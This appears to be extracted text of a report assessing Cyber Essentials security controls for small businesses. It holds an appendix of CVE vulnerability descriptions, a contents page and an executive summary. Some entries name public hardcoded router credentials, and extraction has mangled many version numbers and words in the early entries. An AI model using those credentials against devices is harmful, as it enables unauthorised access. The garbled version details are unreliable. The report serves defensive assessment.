CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880

CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902

CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227

CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network

CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username

CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic

CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp

CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28

MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.

CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed .3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an "a3 01 5b ff" byte sequence.

CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication

CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate

CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo

CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors

CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork

CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL

CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo

CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo

CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message

CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService

CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets

CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code

CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c

CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows

and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158

CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site

CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo

CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460

CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014

CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo

CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction


Survey Responses




Contents

Executive Summary 2

Introduction 3
  Aims 3

Methodology 4
  Data Collection 4
  Vulnerabilities 4
  Mitigation Assessment 5

Analysis 6
  Full Vulnerabilities Assessment 6
  Case Studies 6
  Survey Responses 8

Analysis of Cyber Essentials on High Profile Vulnerabilities 10
  "ShellShock" 10
  "Heartbleed" 10
  "Superfish" 10
  Threat Analysis 11

Conclusions 12
  Additional Tools 12
  Cyber Essentials Controls 12
  Recommendations 12

References 13

Cyber Controls Applicability 14

CVE Details 19

Survey Responses 27

Executive Summary

Findings

This report assesses the effectiveness of the Cyber Essentials controls in mitigating cyber-threats.

Two hundred randomly selected, internet-originating vulnerabilities are analysed for mitigation across four SME networks, with and without the Cyber Essentials controls in place. A network built from survey responses is used to assess the typicality of the SME networks, as well as to develop a broader understanding of typical SME network configurations and security practice.

The aggregated results show that without the Cyber Essentials controls none of the attacks assessed were mitigated on any network. This, more than anything else, should be understood by SMEs: taking no action to combat cyber threats simply isn't an option.

With the CE controls in place, more than 99% of the vulnerabilities applicable to the SMEs interviewed were mitigated, fully or partially, as shown in the figure below, which depicts the aggregated results across all cases studied. The approximately one third of exploits that were only partially mitigated rely on hardware or software vendors releasing patches promptly and effectively to combat the vulnerabilities.

Once the vendor has released a security patch, the Patch Management component of Cyber Essentials ensures that the system returns to a secure state. Until a patch is released, however, the vulnerability remains present in the network. For this reason, SMEs should frequently review what services and software are installed, whether each is necessary, and whether a more secure alternative is available.

The few vulnerabilities not mitigated by Cyber Essentials arise from fundamental, hard-coded flaws in hardware or software that cannot be updated or patched to a secure state.

Figure 1: Cyber Essentials Aggregated Vulnerability Mitigation Results

Recommendations

Although the Cyber Essentials controls have been shown to successfully mitigate the vast majority of the attacks assessed, it is important to note that only 'commodity-level' exploits (as defined by the Cyber Essentials Framework)[10] viable for a remote attack have been considered.

The scope of this report does not address vulnerability to insider threats, social engineering, physically proximate attackers or other targeted attacks. A follow-up study with a wider scope is recommended, to investigate the risks from these other forms of attack when Cyber Essentials is in use.

The '10 Steps to Cyber Security' report published by CESG[2] highlights that, in order to maximise the security of a network, it is essential not only to consider the prevention of attacks with the use of tools, but also to ensure that all employees are adequately educated in network security and subject to scrutiny through access logs and data-loss-prevention schemes, in order to achieve a secure business in the face of potential local and remote attacks. We would recommend that, especially for larger organisations, additional security measures such as these be put in place.

For hardware or software identified as inherently flawed, resulting in vulnerabilities that cannot be mitigated, our recommendation is that these products be avoided when building an SME network. In addition, a global list of unsafe products could be collectively developed and made publicly available. This relates to our last recommendation: integrating Cyber Essentials further with collective security approaches such as the Cyber-security Information Sharing Partnership (CiSP)[4], which keep SMEs supplied with the latest information about vulnerabilities and other cyber-threats.


Introduction

